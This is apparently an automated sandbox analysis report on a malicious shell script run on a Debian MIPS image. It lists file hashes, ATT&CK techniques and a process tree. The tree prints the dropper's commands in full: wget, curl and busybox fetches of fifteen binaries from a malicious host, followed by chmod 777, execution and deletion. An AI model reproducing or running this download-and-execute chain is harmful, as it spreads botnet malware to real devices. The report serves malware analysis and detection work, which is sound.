Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/10/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
-
Size
10KB
-
MD5
b9ad3b4d531f384be07b7d4aa81a5b72
-
SHA1
ebe6f66e8450612015e404c679b5b0196cebcecc
-
SHA256
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30
-
SHA512
b97e2d58000db3fb1342b6ef83b948820f4812618f29899f1577ed686b34e649b8663b65dc4c11760502353bfbb5bb367d7a5f981c1696a84b558f7d6e222bd1
-
SSDEEP
192:1Iz9tYb3++kELeypwSrSxvE5/qvEPP9tYb32kELeyTJ:1I1+kELeyqaSxvE4vErkELeyV
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 896 chmod 912 chmod 749 chmod 848 chmod 888 chmod 904 chmod 927 chmod 801 chmod 838 chmod 880 chmod 856 chmod 864 chmod 872 chmod 919 chmod 935 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c 750 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F 802 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 839 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt 849 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL 857 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI 865 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH 873 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG 881 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx 889 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB 897 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW 905 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW 913 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst 920 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI 928 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB 936 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 47 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 869 curl 871 busybox 885 curl 893 curl 911 busybox 918 busybox 747 busybox 868 wget 915 wget 938 wget 723 wget 837 busybox 863 busybox 879 busybox 901 curl 903 busybox 908 wget 926 busybox 916 curl 923 wget 931 wget 932 curl 934 busybox 841 wget 845 curl 855 busybox 884 wget 924 curl 939 curl 753 curl 804 wget 847 busybox 852 wget 853 curl 860 wget 876 wget 877 curl 892 wget 900 wget 739 curl 755 busybox 861 curl 887 busybox 895 busybox 752 wget 805 curl 909 curl -
Writes file to tmp directory 15 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F curl File opened for modification /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI curl File opened for modification /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB curl File opened for modification /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI curl File opened for modification /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 curl File opened for modification /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW curl File opened for modification /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW curl File opened for modification /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c curl File opened for modification /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt curl File opened for modification /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx curl File opened for modification /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB curl File opened for modification /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst curl File opened for modification /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL curl File opened for modification /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH curl File opened for modification /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG curl
Processes
-
/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh1⤵PID:717
-
/bin/rm/bin/rm bins.sh2⤵PID:720
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- System Network Configuration Discovery
PID:723
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- System Network Configuration Discovery
PID:747
-
-
/bin/chmodchmod 777 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c./T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- System Network Configuration Discovery
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- System Network Configuration Discovery
PID:755
-
-
/bin/chmodchmod 777 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F./LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:803
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- System Network Configuration Discovery
PID:804
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- System Network Configuration Discovery
PID:837
-
-
/bin/chmodchmod 777 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6./rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:840
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- System Network Configuration Discovery
PID:841
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- System Network Configuration Discovery
PID:847
-
-
/bin/chmodchmod 777 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt./LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL./PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:859
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- System Network Configuration Discovery
PID:860
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/chmodchmod 777 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI./lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:867
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- System Network Configuration Discovery
PID:868
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- System Network Configuration Discovery
PID:871
-
-
/bin/chmodchmod 777 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH./MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG./5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx./PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- System Network Configuration Discovery
PID:895
-
-
/bin/chmodchmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW./z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- System Network Configuration Discovery
PID:911
-
-
/bin/chmodchmod 777 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW./ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- System Network Configuration Discovery
PID:918
-
-
/bin/chmodchmod 777 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst./Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- System Network Configuration Discovery
PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- System Network Configuration Discovery
PID:926
-
-
/bin/chmodchmod 777 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI./8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:930
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- System Network Configuration Discovery
PID:931
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- System Network Configuration Discovery
PID:934
-
-
/bin/chmodchmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:937
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- System Network Configuration Discovery
PID:938
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:939
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114B
MD5546071c6a6aeff34580b4d1a9b35a7c3
SHA1dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA2562d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97